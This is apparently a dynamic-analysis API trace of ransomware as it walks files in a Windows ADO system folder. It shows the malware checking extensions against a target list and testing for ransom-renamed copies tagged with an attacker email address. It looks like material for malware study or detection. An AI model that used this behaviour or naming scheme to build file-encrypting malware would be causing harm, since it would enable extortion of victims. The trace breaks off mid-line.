lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0184.747] lstrlenW (lpString=".zip") returned 4 [0184.747] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0184.747] lstrlenW (lpString=".rar") returned 4 [0184.747] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0184.747] lstrlenW (lpString=".bz2") returned 4 [0184.747] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0184.747] lstrlenW (lpString=".7z") returned 3 [0184.748] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0184.748] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0184.748] lstrlenW (lpString=".dbf") returned 4 [0184.748] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0184.748] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0184.748] lstrlenW (lpString=".1cd") returned 4 [0184.748] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0184.748] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned 63 [0184.748] lstrlenW (lpString=".jpg") returned 4 [0184.748] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0184.749] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0184.749] lstrlenW (lpString="msader15.dll") returned 12 [0184.749] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0184.749] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=2560) returned 1 [0184.749] CloseHandle (hObject=0x39c) returned 1 [0184.749] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll")) returned 0x20 [0184.749] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.749] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msader15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0184.749] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0184.749] lstrlenW (lpString=".doc") returned 4 [0184.749] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.750] lstrlenW (lpString=".docx") returned 5 [0184.750] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0184.750] lstrlenW (lpString=".pdf") returned 4 [0184.750] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.750] lstrlenW (lpString=".xls") returned 4 [0184.750] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.750] lstrlenW (lpString=".xlsx") returned 5 [0184.750] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0184.750] lstrlenW (lpString=".ppt") returned 4 [0184.750] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0184.750] lstrlenW (lpString=".zip") returned 4 [0184.750] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.750] lstrlenW (lpString=".rar") returned 4 [0184.750] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.750] lstrlenW (lpString=".bz2") returned 4 [0184.750] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.750] lstrlenW (lpString=".7z") returned 3 [0184.750] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0184.750] lstrlenW (lpString=".dbf") returned 4 [0184.750] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0184.750] lstrlenW (lpString=".1cd") returned 4 [0184.750] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.750] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0184.750] lstrlenW (lpString=".jpg") returned 4 [0184.750] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0184.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0184.751] lstrlenW (lpString=".doc") returned 4 [0184.751] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.751] lstrlenW (lpString=".docx") returned 5 [0184.751] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0184.751] lstrlenW (lpString=".pdf") returned 4 [0184.751] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.751] lstrlenW (lpString=".xls") returned 4 [0184.751] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.751] lstrlenW (lpString=".xlsx") returned 5 [0184.751] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0184.751] lstrlenW (lpString=".ppt") returned 4 [0184.751] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0184.751] lstrlenW (lpString=".zip") returned 4 [0184.751] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.751] lstrlenW (lpString=".rar") returned 4 [0184.751] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.751] lstrlenW (lpString=".bz2") returned 4 [0184.751] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.751] lstrlenW (lpString=".7z") returned 3 [0184.751] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0184.751] lstrlenW (lpString=".dbf") returned 4 [0184.751] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0184.751] lstrlenW (lpString=".1cd") returned 4 [0184.751] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msader15.dll") returned 53 [0184.752] lstrlenW (lpString=".jpg") returned 4 [0184.752] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.752] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0184.752] lstrlenW (lpString="msado15.dll") returned 11 [0184.752] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0184.752] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=1233920) returned 1 [0184.752] CloseHandle (hObject=0x39c) returned 1 [0184.752] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll")) returned 0x20 [0184.752] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.752] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.753] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0184.753] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0184.753] lstrlenW (lpString=".doc") returned 4 [0184.753] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.753] lstrlenW (lpString=".docx") returned 5 [0184.753] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0184.753] lstrlenW (lpString=".pdf") returned 4 [0184.753] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.753] lstrlenW (lpString=".xls") returned 4 [0184.753] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.753] lstrlenW (lpString=".xlsx") returned 5 [0184.753] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0184.753] lstrlenW (lpString=".ppt") returned 4 [0184.753] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.753] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0184.753] lstrlenW (lpString=".zip") returned 4 [0184.753] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.753] lstrlenW (lpString=".rar") returned 4 [0184.753] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.753] lstrlenW (lpString=".bz2") returned 4 [0184.753] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.753] lstrlenW (lpString=".7z") returned 3 [0184.753] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.753] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0184.753] lstrlenW (lpString=".dbf") returned 4 [0184.753] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.753] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0184.754] lstrlenW (lpString=".1cd") returned 4 [0184.754] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0184.754] lstrlenW (lpString=".jpg") returned 4 [0184.754] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0184.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0184.754] lstrlenW (lpString=".doc") returned 4 [0184.754] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0184.754] lstrlenW (lpString=".docx") returned 5 [0184.754] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0184.754] lstrlenW (lpString=".pdf") returned 4 [0184.754] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0184.754] lstrlenW (lpString=".xls") returned 4 [0184.754] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0184.754] lstrlenW (lpString=".xlsx") returned 5 [0184.754] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0184.754] lstrlenW (lpString=".ppt") returned 4 [0184.754] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0184.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0184.754] lstrlenW (lpString=".zip") returned 4 [0184.754] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0184.754] lstrlenW (lpString=".rar") returned 4 [0184.754] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0184.754] lstrlenW (lpString=".bz2") returned 4 [0184.754] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0184.754] lstrlenW (lpString=".7z") returned 3 [0184.754] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0184.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0184.754] lstrlenW (lpString=".dbf") returned 4 [0184.755] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0184.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0184.755] lstrlenW (lpString=".1cd") returned 4 [0184.755] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0184.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado15.dll") returned 52 [0184.755] lstrlenW (lpString=".jpg") returned 4 [0184.755] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0184.755] lstrcmpiW (lpString1=".tlb", lpString2=".bat") returned 1 [0184.755] lstrlenW (lpString="msado20.tlb") returned 11 [0184.755] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0184.756] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=50688) returned 1 [0184.756] CloseHandle (hObject=0x39c) returned 1 [0184.756] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb")) returned 0x20 [0184.756] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.756] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado20.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0184.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0184.756] lstrlenW (lpString=".doc") returned 4 [0184.756] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0184.756] lstrlenW (lpString=".docx") returned 5 [0184.756] lstrcmpiW (lpString1=".docx", lpString2="0.tlb") returned -1 [0184.756] lstrlenW (lpString=".pdf") returned 4 [0184.756] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0184.756] lstrlenW (lpString=".xls") returned 4 [0184.756] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0184.756] lstrlenW (lpString=".xlsx") returned 5 [0184.756] lstrcmpiW (lpString1=".xlsx", lpString2="0.tlb") returned -1 [0184.756] lstrlenW (lpString=".ppt") returned 4 [0184.757] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0184.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0184.757] lstrlenW (lpString=".zip") returned 4 [0184.757] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0184.757] lstrlenW (lpString=".rar") returned 4 [0184.757] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0184.757] lstrlenW (lpString=".bz2") returned 4 [0184.757] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0184.757] lstrlenW (lpString=".7z") returned 3 [0184.757] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0184.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0184.757] lstrlenW (lpString=".dbf") returned 4 [0184.757] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0184.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0184.757] lstrlenW (lpString=".1cd") returned 4 [0184.757] lstrcmpiW (lpString1=".1cd", lpString2=".tlb") returned -1 [0184.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0184.757] lstrlenW (lpString=".jpg") returned 4 [0184.757] lstrcmpiW (lpString1=".jpg", lpString2=".tlb") returned -1 [0184.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0184.757] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0184.757] lstrlenW (lpString=".doc") returned 4 [0184.757] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0184.757] lstrlenW (lpString=".docx") returned 5 [0184.757] lstrcmpiW (lpString1=".docx", lpString2="0.tlb") returned -1 [0184.757] lstrlenW (lpString=".pdf") returned 4 [0184.757] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0184.757] lstrlenW (lpString=".xls") returned 4 [0184.758] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0184.758] lstrlenW (lpString=".xlsx") returned 5 [0184.758] lstrcmpiW (lpString1=".xlsx", lpString2="0.tlb") returned -1 [0184.758] lstrlenW (lpString=".ppt") returned 4 [0184.758] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0184.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0184.758] lstrlenW (lpString=".zip") returned 4 [0184.758] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0184.758] lstrlenW (lpString=".rar") returned 4 [0184.758] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0184.758] lstrlenW (lpString=".bz2") returned 4 [0184.758] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0184.758] lstrlenW (lpString=".7z") returned 3 [0184.758] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0184.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0184.758] lstrlenW (lpString=".dbf") returned 4 [0184.758] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0184.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0184.758] lstrlenW (lpString=".1cd") returned 4 [0184.758] lstrcmpiW (lpString1=".1cd", lpString2=".tlb") returned -1 [0184.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado20.tlb") returned 52 [0184.758] lstrlenW (lpString=".jpg") returned 4 [0184.758] lstrcmpiW (lpString1=".jpg", lpString2=".tlb") returned -1 [0184.758] lstrcmpiW (lpString1=".tlb", lpString2=".bat") returned 1 [0184.758] lstrlenW (lpString="msado21.tlb") returned 11 [0184.759] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0184.759] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=53760) returned 1 [0184.759] CloseHandle (hObject=0x39c) returned 1 [0184.759] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb")) returned 0x20 [0184.759] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.760] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado21.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0184.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0184.760] lstrlenW (lpString=".doc") returned 4 [0184.760] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0184.760] lstrlenW (lpString=".docx") returned 5 [0184.760] lstrcmpiW (lpString1=".docx", lpString2="1.tlb") returned -1 [0184.760] lstrlenW (lpString=".pdf") returned 4 [0184.760] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0184.760] lstrlenW (lpString=".xls") returned 4 [0184.760] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0184.760] lstrlenW (lpString=".xlsx") returned 5 [0184.760] lstrcmpiW (lpString1=".xlsx", lpString2="1.tlb") returned -1 [0184.760] lstrlenW (lpString=".ppt") returned 4 [0184.760] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0184.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0184.760] lstrlenW (lpString=".zip") returned 4 [0184.760] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0184.760] lstrlenW (lpString=".rar") returned 4 [0184.760] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0184.760] lstrlenW (lpString=".bz2") returned 4 [0184.760] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0184.760] lstrlenW (lpString=".7z") returned 3 [0184.760] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0184.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0184.760] lstrlenW (lpString=".dbf") returned 4 [0184.761] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0184.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0184.761] lstrlenW (lpString=".1cd") returned 4 [0184.761] lstrcmpiW (lpString1=".1cd", lpString2=".tlb") returned -1 [0184.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0184.761] lstrlenW (lpString=".jpg") returned 4 [0184.761] lstrcmpiW (lpString1=".jpg", lpString2=".tlb") returned -1 [0184.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0184.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0184.761] lstrlenW (lpString=".doc") returned 4 [0184.761] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0184.761] lstrlenW (lpString=".docx") returned 5 [0184.761] lstrcmpiW (lpString1=".docx", lpString2="1.tlb") returned -1 [0184.761] lstrlenW (lpString=".pdf") returned 4 [0184.761] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0184.761] lstrlenW (lpString=".xls") returned 4 [0184.761] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0184.761] lstrlenW (lpString=".xlsx") returned 5 [0184.761] lstrcmpiW (lpString1=".xlsx", lpString2="1.tlb") returned -1 [0184.761] lstrlenW (lpString=".ppt") returned 4 [0184.761] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0184.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0184.761] lstrlenW (lpString=".zip") returned 4 [0184.761] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0184.761] lstrlenW (lpString=".rar") returned 4 [0184.761] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0184.761] lstrlenW (lpString=".bz2") returned 4 [0184.761] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0184.761] lstrlenW (lpString=".7z") returned 3 [0184.761] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0184.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0184.762] lstrlenW (lpString=".dbf") returned 4 [0184.762] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0184.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0184.762] lstrlenW (lpString=".1cd") returned 4 [0184.762] lstrcmpiW (lpString1=".1cd", lpString2=".tlb") returned -1 [0184.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado21.tlb") returned 52 [0184.762] lstrlenW (lpString=".jpg") returned 4 [0184.762] lstrcmpiW (lpString1=".jpg", lpString2=".tlb") returned -1 [0184.762] lstrcmpiW (lpString1=".tlb", lpString2=".bat") returned 1 [0184.762] lstrlenW (lpString="msado25.tlb") returned 11 [0184.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0184.763] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=69632) returned 1 [0184.763] CloseHandle (hObject=0x39c) returned 1 [0184.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb")) returned 0x20 [0184.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0184.763] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado25.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 52 [0184.763] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 52 [0184.763] lstrlenW (lpString=".doc") returned 4 [0184.763] lstrcmpiW (lpString1=".doc", lpString2=".tlb") returned -1 [0184.763] lstrlenW (lpString=".docx") returned 5 [0184.763] lstrcmpiW (lpString1=".docx", lpString2="5.tlb") returned -1 [0184.763] lstrlenW (lpString=".pdf") returned 4 [0184.763] lstrcmpiW (lpString1=".pdf", lpString2=".tlb") returned -1 [0184.763] lstrlenW (lpString=".xls") returned 4 [0184.763] lstrcmpiW (lpString1=".xls", lpString2=".tlb") returned 1 [0184.764] lstrlenW (lpString=".xlsx") returned 5 [0184.764] lstrcmpiW (lpString1=".xlsx", lpString2="5.tlb") returned -1 [0184.764] lstrlenW (lpString=".ppt") returned 4 [0184.764] lstrcmpiW (lpString1=".ppt", lpString2=".tlb") returned -1 [0184.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 52 [0184.764] lstrlenW (lpString=".zip") returned 4 [0184.764] lstrcmpiW (lpString1=".zip", lpString2=".tlb") returned 1 [0184.764] lstrlenW (lpString=".rar") returned 4 [0184.764] lstrcmpiW (lpString1=".rar", lpString2=".tlb") returned -1 [0184.764] lstrlenW (lpString=".bz2") returned 4 [0184.764] lstrcmpiW (lpString1=".bz2", lpString2=".tlb") returned -1 [0184.764] lstrlenW (lpString=".7z") returned 3 [0184.764] lstrcmpiW (lpString1=".7z", lpString2="tlb") returned -1 [0184.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\msado25.tlb") returned 52 [0184.764] lstrlenW (lpString=".dbf") returned 4 [0184.764] lstrcmpiW (lpString1=".dbf", lpString2=".tlb") returned -1 [0184.898] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.898] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x361fec0 | out: lpNewFilePointer=0x0) returned 1 [0184.898] CreateFileW (lpFileName="C:\\Program Files\\Internet 